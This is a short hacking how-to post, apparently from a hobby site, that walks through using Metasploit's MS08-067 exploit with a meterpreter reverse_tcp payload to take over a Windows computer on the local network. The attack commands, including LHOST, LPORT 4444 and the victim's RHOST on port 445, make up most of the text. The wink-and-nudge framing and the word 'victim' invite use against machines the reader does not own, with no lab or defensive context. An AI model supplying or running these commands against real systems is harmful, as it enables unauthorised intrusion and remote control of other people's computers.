Here is a not so detailed How-to guide by CoenW1 on hacking a computer on your local area network so use your imagination on this one… hint hint, nudge nudge 🙂
Start Kali Linux and start a new terminal.
Start the Metasploit console by typing: msfconsole
This will take a few moments…
So Metasploit started.
Here are the commands you need to type in:
use windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST *Your ip adress* (If you don’t know your ip adress then open a new terminal and type ifconfig. your ip adress will be somewhere in the output :D)
set LPORT 4444
set RHOST *victim’s ip*
set RPORT 445
exploit
(You should connect)
Type help for a list of commands.
Tags: Hacking
Batteries are fascinating devices that we often take for granted…
Robot is an electromechanical device which is capable of reacting…
Earlier this year, the laws around legal operation of remote…